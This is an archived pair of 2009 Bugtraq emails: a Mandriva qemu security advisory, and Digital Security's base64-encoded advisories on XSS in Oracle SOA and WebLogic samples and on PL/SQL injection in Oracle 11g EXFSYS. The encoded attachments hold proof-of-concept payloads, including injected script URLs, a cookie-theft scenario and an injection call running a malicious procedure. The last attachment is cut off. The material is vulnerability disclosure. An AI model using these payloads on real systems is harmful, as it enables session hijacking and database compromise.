by outgoing3.securityfocus.com (Postfix) with QMQP
id 5541D2373B9; Wed, 14 Jan 2009 09:17:33 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25168 invoked from network); 14 Jan 2009 05:17:07 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=P6ZTSKsteIas8bDiFtMA:9 a�xgvmEG34sBAjQy0C4A:7 a=O4jKzKBaaklTcMGwGvYOOnwo9fUA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:008 ] qemu
Date: Tue, 13 Jan 2009 22:47:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMyaj-0004iA-BN@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:008
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of qemu version 0.9.1 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 502c50a55fdb3e3e8ab0456be79a08b1  2009.0/i586/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm
 bf48619b2f7cb0275d379682a4795dc1  2009.0/i586/qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
 4fb74c4d8356442ccd9c6ddd063f4191  2009.0/i586/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 99f7c6b4de73bcab46664c90ae6edc50  2009.0/x86_64/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm
 a22b95b6a4673f1300742b4777c4149b  2009.0/x86_64/qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
 502371419a98b187c9db90e4217242de  2009.0/x86_64/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVFvmqjQ0CJFipgRAjcTAJ4rTf6Icqu1/43aSLb/G0TZbE4IFwCeKQN2
MzEgGFk72/muA0J0kDkvqhc=g6Xd
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058dd
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39171-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id ACFCFEC145
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:31:44 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id C73BE1438A1; Wed, 14 Jan 2009 09:32:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30489 invoked from network); 14 Jan 2009 10:23:49 -0000
Date: Wed, 14 Jan 2009 13:45:07 +0300
From: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
X-Mailer: The Bat! (v3.99.29) Professional
Reply-To: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1554988.20090114134507@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: Oracle CPU Jan 2009 Advisories.
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------BBCA1ED38A711B4"
Status:   

------------BBCA1ED38A711B4
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Advisories for Oracle CPU January 2009 vulnerabilities Attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  
www.dsec.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure 
is strictly prohibited. If you have received this message in error, please notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------      
------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt"

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5ICAg
ICNEU0VDUkctMDktMDAxDQoNCg0KDQpBcHBsaWNhdGlvbjoJCQlPcmFjbGUgQXBwbGljYXRp
b24gU2VydmVyIChTT0EpDQpWZXJzaW9ucyBBZmZlY3RlZDoJCU9yYWNsZSBBcHBsaWNhdGlv
biBTZXJ2ZXIgKFNPQSkgdmVyc2lvbiAxMC4xLjMuMS4wICANClZlbmRvciBVUkw6CQkJaHR0
cDovL3d3dy5vcmFjbGUuY29tDQpCdWdzOgkJCQlYU1MNCkV4cGxvaXRzOgkJCVlFUw0KUmVw
b3J0ZWQ6CQkJMTAuMDEuMjAwOA0KVmVuZG9yIHJlc3BvbnNlOgkJMTEuMDEuMjAwOA0KRGF0
ZSBvZiBQdWJsaWMgQWR2aXNvcnk6ICAgICAgICAxMy4wMS4yMDA5DQpDVkU6ICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIENWRS0yMDA4LTQwMTQNCkRlc2NyaXB0aW9uOiAgIAkJICAg
ICAgICBYU1MgSU4gQlBFTENPTlNPTEUvREVGQVVMVC9BQ1RJVklUSUVTLkpTUCANCkF1dGhv
cjoJCQkgICAgICAgIEFsZXhhbmRyIFBvbHlha292DQoJCQkJRGlnaXRhbCBTZWN1cml0eSBS
ZWFzZWFyY2ggR3JvdXAgW0RTZWNSR10gKHJlc2VhcmNoIFthdF0gZHNlYyBbZG90XSBydSkN
Cg0KDQpEZXNjcmlwdGlvbg0KKioqKioqKioqKioNCg0KTGlua2VkIFhTUyB2dWxuZXJhYmls
aXR5IGZvdW5kIGluICBCUEVMIG1vZHVsZSBvZiBPcmFjbGUgQXBwbGljYXRpb24gU2VydmVy
IChPcmFjbGUgU09BIFN1aXRlKS4gIA0KDQoNCg0KRGV0YWlscw0KKioqKioqKg0KDQoNCkxp
bmtlZCBYU1MgdnVsbmVyYWJpbGl0eSBmb3VuZCBpbiAgQlBFTCBtb2R1bGUuIEluIHBhZ2Ug
QlBFTENvbnNvbGUvZGVmYXVsdC9hY3Rpdml0aWVzLmpzcCAgIGF0dGFja2VyIGNhbiBpbmpl
Y3QgWFNTIGJ5IGFwcGVuZGluZyBpdCB0byBVUkwNCg0KDQoNCg0KRXhhbXBsZQ0KKioqKioq
Kg0KDQoNCmh0dHA6Ly9bbG9jYWxob3N0XTo4ODg4L0JQRUxDb25zb2xlL2RlZmF1bHQvYWN0
aXZpdGllcy5qc3A/Jz48c2NyaXB0PmFsZXJ0KCdEU0VDX1hTUycpPC9zY3JpcHQ+PURTZWNS
Rw0KDQoNCg0KQXR0YWNrZXIgbXVzdCBzZW5kIGluamVjdGVkIGxpbmsgdG8gYWRtaW5pc3Ry
YXRvciBhbmQgZ2V0IGFkbWluaWF0cmF0b3JzIGNvb2tpZS4NCg0KDQpDb2RlIHdpdGggaW5q
ZWN0ZWQgWFNTOg0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiA8L3RoPg0KICAgICAgICAgICAgICAgICAg
ICA8dGggaWQ9ImFjdGl2aXR5TGFiZWwiIGNsYXNzPSJMaXN0SGVhZGVyIiBhbGlnbj0ibGVm
dCIgbm93cmFwPg0KICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSdhY3Rpdml0aWVzLmpz
cD8nPjxzY3JpcHQ+YWxlcnQoJ0RTZWNSR19YU1MnKTwvc2NyaXB0Pj1EU2VjUkcmb3JkZXJC
eT1sYWJlbCcgY2xhc3M9SGVhZGVyTGluaz4NCiAgICAgICAgICAgICAgICAgICAgICAgIEFj
dGl2aXR5IExhYmVsDQogICAgICAgICAgICAgICAgICAgIDwvYT4NCiAgICAgICAgICAgICAg
ICAgICAgPC90aD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCg0KRml4IEluZm9ybWF0
aW9uDQoqKioqKioqKioqKioqKioNCg0KSW5mb3JtYXRpb24gd2FzIHB1Ymxpc2hlZCBpbiBD
UFUgSmFudWFyeSAyMDA5Lg0KQWxsIGN1c3RvbWVycyBjYW4gZG93bmxvYWQgQ1BVIHBldGNo
ZXMgZm9sbG93aW5nIGluc3RydWN0aW9ucyBmcm9tOiANCg0KaHR0cDovL3d3dy5vcmFjbGUu
Y29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMv
Y3B1amFuMjAwOS5odG1sIA0KDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0KT3JhY2xlIGdpdmUg
YSBjcmVkaXRzIGZvciBBbGV4YW5kZXIgUG9seWFrb3YgZnJvbSBEaWdpdGFsIFNlY3VyaXR5
IENvbXBhbnkgaW4gQ1BVIEphbnVhcnkgMjAwOS4NCg0KaHR0cDovL3d3dy5vcmFjbGUuY29t
L3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1
amFuMjAwOS5odG1sIA0KDQoNCg0KDQpBYm91dA0KKioqKioNCg0KRGlnaXRhbCBTZWN1cml0
eSBpcyBsZWFkaW5nIElUIHNlY3VyaXR5IGNvbXBhbnkgaW4gUnVzc2lhLCBwcm92aWRpbmcg
aW5mb3JtYXRpb24gc2VjdXJpdHkgY29uc3VsdGluZywgYXVkaXQgYW5kIHBlbmV0cmF0aW9u
IHRlc3Rpbmcgc2VydmljZXMsIHJpc2sgYW5hbHlzaXMgYW5kIElTTVMtcmVsYXRlZCBzZXJ2
aWNlcyBhbmQgY2VydGlmaWNhdGlvbiBmb3IgSVNPL0lFQyAyNzAwMToyMDA1IGFuZCBQQ0kg
RFNTIHN0YW5kYXJkcy4gRGlnaXRhbCBTZWN1cml0eSBSZXNlYXJjaCBHcm91cCBmb2N1c2Vz
IG9uIHdlYiBhcHBsaWNhdGlvbiBhbmQgZGF0YWJhc2Ugc2VjdXJpdHkgcHJvYmxlbXMgd2l0
aCB2dWxuZXJhYmlsaXR5IHJlcG9ydHMsIGFkdmlzb3JpZXMgYW5kIHdoaXRlcGFwZXJzIHBv
c3RlZCByZWd1bGFybHkgb24gb3VyIHdlYnNpdGUuDQoNCg0KQ29udGFjdDoJcmVzZWFyY2gg
W2F0XSBkc2VjIFtkb3RdIHJ1DQoJCWh0dHA6Ly93d3cuZHNlY3JnLnJ1IA0KCQlodHRwOi8v
d3d3LmRzZWMucnUNCg0KDQoNCg0KDQoNCg=------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_�SS_vulnerability.txt?="
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="=?windows-1251?Q?[DSECRG-09-002]_Oracle_BEA_Weblogic_10_Linked_�SS_vulnerability.txt?="

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5CSNE
U0VDUkctMDktMDAyDQoNCg0KQXBwbGljYXRpb246CQkJT3JhY2xlIEJFQSBXZWJsb2dpYyAx
MCANClZlcnNpb25zIEFmZmVjdGVkOgkJT3JhY2xlIEJFQSBXZWJsb2dpYyAxMCAgDQpWZW5k
b3IgVVJMOgkJCWh0dHA6Ly9vcmFjbGUuY29tDQpCdWdzOgkJCQlNdWx0aXBsZSBYU1MgVnVs
bmVyYWJpbGl0aWVzIGluIHNhbXBsZXMNCkV4cGxvaXRzOgkJCVlFUw0KUmVwb3J0ZWQ6CQkJ
MTYuMDcuMjAwOA0KVmVuZG9yIHJlc3BvbnNlOgkJMTguMDcuMjAwOCANCkxhc3QgcmVzcG9u
c2U6ICAgICAgICAgICAgICAgICAgMzAuMTAuMjAwOA0KRGVzY3JpcHRpb246ICAgCQkJcmV2
aWV3U2VydmljZSBzYW1wbGUgb2YgV2ViTG9naWMgU2VydmVyLgkNCkRhdGUgb2YgUHVibGlj
IEFkdmlzb3J5OgkxMy4wMS4yMDA5ICANCkF1dGhvcnM6CQkJQWxleGFuZHIgUG9seWFrb3YN
CgkJCQlEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIChyZXNlYXJj
aCBbYXRdIGRzZWMgW2RvdF0gcnUpDQoNCg0KRGVzY3JpcHRpb24NCioqKioqKioqKioqDQoN
Cg0KTXVsdGlwbGUgWFNTIFZ1bG5lcmFiaWxpdGllcyBmb3VuZCBpbiBPcmFjbGUgQkVBIFdl
YmxvZ2ljIFNlcnZlciBzYW1wbGVzIHZlcnNpb24gMTAuMiBhbmQgbGF0ZXN0Lg0KDQoNCg0K
RGV0YWlscw0KKioqKioqKg0KDQpWdWxuZXJhYmlsaXRpZXMgZm91bmQgaW4gcmV2aWV3U2Vy
dmljZSBzYW1wbGUgb2YgV2VibG9naWMgU2VydmVyLg0KDQoxLiBMaW5rZWQgWFNTIGZvdW5k
IGluIGNyZWF0ZUFydGlzdF9zZXJ2aWNlLmpzcCBwYWdlLiBWdWxuZXJhYmxlIHBhcmFtZXRl
ciAibmFtZSINCg0KDQpFeGFtcGxlDQoqKioqKioqDQpodHRwOi8vdGVzdHNlcnZlci5jb206
NzAwMS9yZXZpZXdTZXJ2aWNlL2NyZWF0ZUFydGlzdF9zZXJ2aWNlLmpzcD9uYW1lPTxzY3Jp
cHQ+YWxlcnQoJ0RTRUNSRycpPC9zY3JpcHQ+DQoNCg0KMi4gTGlua2VkIFhTUyBmb3VuZCBp
biBhZGRCb29rc19zZXNzaW9uX2VqYjIxLmpzcC4gVnVsbmVyYWJsZSBwYXJhbWV0ZXIgInRp
dGxlIg0KDQoNCkV4YW1wbGUNCioqKioqKioNCmh0dHA6Ly90ZXN0c2VydmVyLmNvbTo3MDAx
L3Jldmlld1NlcnZpY2UvYWRkQm9va3Nfc2Vzc2lvbl9lamIyMS5qc3A/bmFtZT0xMTEmdGl0
bGU9PHNjcmlwdD5hbGVydCgnRFNFQ1JHJyk8L3NjcmlwdD4NCg0KDQozLiBMaW5rZWQgWFNT
IGZvdW5kIGluIGFkZEJvb2tzX3Nlc3Npb25fZWpiMjEuanNwLiBWdWxuZXJhYmxlIHBhcmFt
ZXRlciAicmF0aW5nIg0KDQpFeGFtcGxlDQoqKioqKioqDQpodHRwOi8vdGVzdHNlcnZlci5j
b206NzAwMS9yZXZpZXdTZXJ2aWNlL2FkZFJldmlld19zZXJ2aWNlLmpzcD9jb21tZW50PTEx
MSZyYXRpbmc9PHNjcmlwdD5hbGVydCgnRFNFQ1JHJyk8L3NjcmlwdD4NCg0KNC4gTGlua2Vk
IFhTUyBmb3VuZCBpbiBhZGRCb29rc19zZXNzaW9uX2VqYjIxLmpzcC4gVnVsbmVyYWJsZSBw
YXJhbWV0ZXIgInJhdGluZyINCg0KRXhhbXBsZQ0KKioqKioqKg0KaHR0cDovL3Rlc3RzZXJ2
ZXIuY29tOjcwMDEvcmV2aWV3U2VydmljZS9hZGRSZXZpZXdfc2Vzc2lvbi5qc3A/Y29tbWVu
dD0xMTEmcmF0aW5nPTxzY3JpcHQ+YWxlcnQoJ0RTRUNSRycpPC9zY3JpcHQ+DQoNCjUuIEFs
c28gdGhlcmUgYXJlIGEgY291cGxlIG9mIFhTUyB2dWxuZXJhYmlsaXRpZXMgaW4gUE9TVCBw
YXJhbWV0ZXJzIGluIHNjcmlwdHM6DQoNCg0KaHR0cDovL3Rlc3RzZXJ2ZXIuY29tOjcwMDEv
cmV2aWV3U2VydmljZS9leGFtcGxlc1dlYkFwcC9KV1NfV2ViU2VydmljZS5qc3ANCmh0dHA6
Ly90ZXN0c2VydmVyLmNvbTo3MDAxL3Jldmlld1NlcnZpY2UvQ2xpZW50U2VydmxldA0KaHR0
cDovL3Rlc3RzZXJ2ZXIuY29tOjcwMDEvcmV2aWV3U2VydmljZS9JbnRlcmNlcHRvckNsaWVu
dFNlcnZsZXQNCmh0dHA6Ly90ZXN0c2VydmVyLmNvbTo3MDAxL3Jldmlld1NlcnZpY2UvY3Jl
YXRlQXJ0aXN0X3NlcnZpY2UuanNwDQpodHRwOi8vdGVzdHNlcnZlci5jb206NzAwMS9yZXZp
ZXdTZXJ2aWNlL2NyZWF0ZUFydGlzdF9zZXNzaW9uLmpzcA0KDQpGaXggSW5mb3JtYXRpb24N
CioqKioqKioqKioqKioqKg0KDQpUaGlzIGlzIFNlY3VyaXR5LUluLURlcHRoIHZ1bG5lcmFi
aWxpdHksIGJlY2F1c2Ugd2FzIGZvdW5kIGluIHNhbXBsZXMuKGh0dHA6Ly93d3cub3JhY2xl
LmNvbS90ZWNobm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcHUvY3B1ZmFxLmh0bSkgDQpWdWxu
ZXJhYmlsaXR5IGlzc3VlcyB0aGF0IHJlc3VsdCBpbiBzaWduaWZpY2FudCBtb2RpZmljYXRp
b24gb2YgT3JhY2xlIGNvZGUgb3IgZG9jdW1lbnRhdGlvbiBpbiBmdXR1cmUgcmVsZWFzZXMs
DQpidXQgYXJlIG5vdCBvZiBzdWNoIGEgY3JpdGljYWwgbmF0dXJlIHRoYXQgdGhleSBhcmUg
ZGlzdHJpYnV0ZWQgaW4gQ3JpdGljYWwgUGF0Y2ggVXBkYXRlcy4NCg0KDQpodHRwOi8vd3d3
Lm9yYWNsZS5jb20vdGVjaG5vbG9neS9kZXBsb3kvc2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gt
dXBkYXRlcy9jcHVqYW4yMDA5Lmh0bWwgDQoNCg0KQ3JlZGl0cw0KKioqKioqKg0KT3JhY2xl
IGdpdmUgYSBjcmVkaXRzIGZvciBBbGV4YW5kZXIgUG9seWFrb3YgZnJvbSBEaWdpdGFsIFNl
Y3VyaXR5IENvbXBhbnkgaW4gU2VjdXJpdHktSW4tRGVwdGggcHJvZ3JhbSBvZiBDUFUgSmFu
dWFyeSAyMDA5Lg0KDQpodHRwOi8vd3d3Lm9yYWNsZS5jb20vdGVjaG5vbG9neS9kZXBsb3kv
c2VjdXJpdHkvY3JpdGljYWwtcGF0Y2gtdXBkYXRlcy9jcHVqYW4yMDA5Lmh0bWwgDQoNCg0K
QWJvdXQNCioqKioqDQoNCkRpZ2l0YWwgU2VjdXJpdHkgaXMgbGVhZGluZyBJVCBzZWN1cml0
eSBjb21wYW55IGluIFJ1c3NpYSwgcHJvdmlkaW5nIGluZm9ybWF0aW9uIHNlY3VyaXR5IGNv
bnN1bHRpbmcsIGF1ZGl0IGFuZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHNlcnZpY2VzLCByaXNr
IGFuYWx5c2lzIGFuZCBJU01TLXJlbGF0ZWQgc2VydmljZXMgYW5kIGNlcnRpZmljYXRpb24g
Zm9yIElTTy9JRUMgMjcwMDE6MjAwNSBhbmQgUENJIERTUyBzdGFuZGFyZHMuIERpZ2l0YWwg
U2VjdXJpdHkgUmVzZWFyY2ggR3JvdXAgZm9jdXNlcyBvbiB3ZWIgYXBwbGljYXRpb24gYW5k
IGRhdGFiYXNlIHNlY3VyaXR5IHByb2JsZW1zIHdpdGggdnVsbmVyYWJpbGl0eSByZXBvcnRz
LCBhZHZpc29yaWVzIGFuZCB3aGl0ZXBhcGVycyBwb3N0ZWQgcmVndWxhcmx5IG9uIG91ciB3
ZWJzaXRlLg0KDQoNCkNvbnRhY3Q6CXJlc2VhcmNoIFthdF0gZHNlYyBbZG90XSBydQ0KCQlo
dHRwOi8vd3d3LmRzZWNyZy5ydSANCgkJaHR0cDovL3d3dy5kc2VjLnJ1DQoNCg0KDQoNCg0K
DQo------------BBCA1ED38A711B4
Content-Type: text/plain;
 name="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment;
 filename="[DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt"

DQpEaWdpdGFsIFNlY3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIEFkdmlzb3J5CSNE
U0VDUkctMDktMDAzDQoNCg0KQXBwbGljYXRpb246CQkJT3JhY2xlIGRhdGFiYXNlIDExRyAN
ClZlcnNpb25zIEFmZmVjdGVkOgkJT3JhY2xlIDExLjEuMC42IGFuZCAxMC4yLjAuMSAgDQpW
ZW5kb3IgVVJMOgkJCWh0dHA6Ly9vcmFjbGUuY29tDQpCdWdzOgkJCQlQTC9TUUwgSW5qZWN0
aW9ucw0KRXhwbG9pdHM6CQkJWUVTDQpSZXBvcnRlZDoJCQkxNy4xMS4yMDA4DQpWZW5kb3Ig
cmVzcG9uc2U6CQkxOC4xMS4yMDA4DQpMYXN0IHJlc3BvbnNlOiAgICAgICAgICAgICAgICAg
IDI0LjExLjIwMDggICAgICAgICAgCQkJDQpEYXRlIG9mIFB1YmxpYyBBZHZpc29yeToJMTMu
MDEuMjAwOSANCkF1dGhvcnM6CQkJQWxleGFuZHIgUG9seWFrb3YNCgkJCQlEaWdpdGFsIFNl
Y3VyaXR5IFJlc2VhcmNoIEdyb3VwIFtEU2VjUkddIChyZXNlYXJjaCBbYXRdIGRzZWMgW2Rv
dF0gcnUpDQoNCg0KRGVzY3JpcHRpb24NCioqKioqKioqKioqDQoNCk9yYWNsZSBEYXRhYmFz
ZSAxMUcgdnVsbmVyYWJsZSB0byBQTC9TUUwgSW5qZWN0aW9uLg0KDQpWdWxuZXJhYmlsaXR5
IGZvdW5kIGluIEV4dGVuZGVkIGZpbHRlciBzeXN0ZW0gKEVYRlNZUykuDQoNCg0KDQpEZXRh
aWxzDQoqKioqKioqDQoNClBML1NRTCBJbmplY3Rpb24gZm91bmQgaW4gcHJvY2VkdXJlIEVY
RlNZUy5EQk1TX0VYUEZJTF9EUi5HRVRfRVhQUlNFVF9TVEFUUyAobWF5YmUgb3RoZXIgZnVu
Y3Rpb25zIGluIHRoaXMgcGFja2FnZSkNClByb2NlZHVyZSBFWEZTWVMuREJNU19FWFBGSUxf
RFIuR0VUX0VYUFJTRVRfU1RBVFMgZXhlY3V0ZXMgd2l0aCByaWdodHMgb2YgdXNlciAgRVhG
U1lTLg0KDQpJZiBBdHRhY2tlciBoYXZlIGFjY2VzcyAgdG8gRVhGU1lTLkRCTVNfRVhQRklM
X0RSLkdFVF9FWFBSU0VUX1NUQVRTLiBoZSBjYW4gZG8gYWxsIHRoaW5ncyB3aXRoIEVYRlNZ
UyB1c2VyIHJpZ2h0czsNCkJ5IGRlZmF1bHQgdXNlciBFWEZTWVMgaGF2ZSBwcml2ZWxlZ2Ug
ICJDUkVBVEUgTElCUkFSWSIgIGFuZCAiQ1JFQVRFIEFOWSBUUklHR0VSIi4gU28gaGUgdGVv
cmV0aWNhbGx5IGNhbiBnZXQgYWNjZXNzIHRvIE9TLg0KDQoNCml0IGNhbiBvbmx5IGJlIGV4
cGxvaXRlZCBieSBhbiBhdHRhY2tlciB3aG8gaXMgZWl0aGVyIHJ1bm5pbmcgYXMgYSBwcml2
aWxlZ2VkIHVzZXJzLCBlLmcuIGFzIEVYRlNZUw0Kb3IgU1lTLCBvciBvbiBhIHN5c3RlbSB3
aGVyZSBhY2Nlc3MgdG8gdGhlIEVYRlNZUyByb3V0aW5lcyBoYXMgYmVlbiBncmFudGVkIHRv
IHVucHJpdmlsZWdlZCB1c2VycyBzbyB0aGlzIGENCmRlZmVuc2UgaW4gZGVwdGggaXNzdWUu
DQoNCg0KRVhGU1lTLkRCTVNfRVhQRklMX0RSLkdFVF9FWFBSU0VUX1NUQVRTICBoYXMgNCBw
YXJhbWV0ZXJzIA0KDQpUQUJfT1dORVINClRBQl9OQU1FDQpFWFBfQ09MVU1ODQpBU0VUX05N
DQoNCiJBU0VUX05NIiBpcyB2dWxuZXJhYmxlIHRvIFNRTCBJbmplY3Rpb24NCg0KDQoNCg0K
RXhhbXBsZToNCioqKioqKioNCg0KZXhlYyBFWEZTWVMuREJNU19FWFBGSUxfRFIuR0VUX0VY
UFJTRVRfU1RBVFMoJ0VYRlNZUycsJ0VYRiRWRVJTSU9OJywnRVhGVkVSDQpTSU9OJywnWVlZ
WVlZWScnIGFuZCAxPUVWSUxQUk9DKCktLScpDQoNCg0KDQpWdWxuZXJhYmxlIFJlcXVlc3Qg
aW4gdiRzcWwgbG9nIGZpbGUNCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
DQoNCg0KU0VMRUNUIGF0dHJpYnV0ZSwgZGF0YV90eXBlIGZyb20gIEFETV9FWFBGSUxfQVRU
UklCVVRFUyB3aGVyZSBvd25lciA9ICdFWEZTWVMnIGFuZCANCmF0dHJpYnV0ZV9zZXRfbmFt
ZSA9ICdZWVlZWVlZJyBhbmQgRVZJTFBST0MoKT1FVklMUFJPQygpLS0nIGFuZCB0YWJsZV9h
bGlhcyA9ICAnTk8nICBhbmQgKGRhdGFfdHlwZSBsaWtlICdWQVJDSEFSKCUpJyBvciBkYXRh
X3R5cGUgbGlrZSAnVkFSQ0hBUjIoJSknICANCm9yIGRhdGFfdHlwZSA9ICdJTlQnIG9yIGRh
dGFfdHlwZSA9ICdJTlRFR0VSJyBvciAgZGF0YV90eXBlID0gJ05VTUJFUicgb3IgZGF0YV90
eXBlID0gJ0RBVEUnKQ0KDQoNCkZpeCBJbmZvcm1hdGlvbg0KKioqKioqKioqKioqKioqDQoN
ClRoaXMgaXMgU2VjdXJpdHktSW4tRGVwdGggdnVsbmVyYWJpbGl0eS4oaHR0cDovL3d3dy5v
cmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NwdS9jcHVmYXEuaHRtKQ0K
VnVsbmVyYWJpbGl0eSBpc3N1ZXMgdGhhdCByZXN1bHQgaW4gc2lnbmlmaWNhbnQgbW9kaWZp
Y2F0aW9uIG9mIE9yYWNsZSBjb2RlIG9yIGRvY3VtZW50YXRpb24gaW4gZnV0dXJlIHJlbGVh
c2VzLA0KYnV0IGFyZSBub3Qgb2Ygc3VjaCBhIGNyaXRpY2FsIG5hdHVyZSB0aGF0IHRoZXkg
YXJlIGRpc3RyaWJ1dGVkIGluIENyaXRpY2FsIFBhdGNoIFVwZGF0ZXMuDQoNCg0KaHR0cDov
L3d3dy5vcmFjbGUuY29tL3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBh
